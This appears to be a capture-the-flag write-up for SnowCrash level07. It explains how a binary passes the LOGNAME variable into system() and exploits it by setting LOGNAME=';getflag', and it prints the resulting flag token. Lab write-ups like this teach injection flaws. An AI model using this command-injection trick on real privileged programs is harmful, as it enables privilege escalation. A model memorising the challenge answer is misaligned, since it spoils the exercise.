In the /home, there is a binary executable

By studying its hex with: xxd level07 | less

We can see:

0000680: 4c4f 474e 414d 4500 2f62 696e 2f65 6368  LOGNAME./bin/ech
0000690: 6f20 2573 2000 0000 011b 033b 3000 0000  o %s ......;0...

The executable prints the LOGNAME env var with /bin/echo. Since it uses the full path of echo, we won't be able to abuse it...

Except that, with nm, we see that the code uses the syscall system.

(the exploit:) https://wiki.sei.cmu.edu/confluence/pages/viewpage.action?pageId=87152177

What we do is, we just rewrite LOGNAME so that the call becomes "/bin/echo;getflag".
level07@SnowCrash:~$ LOGNAME=";getflag" ./level07

Check flag.Here is your token : fiumuikeil55xe9cu4dood66h
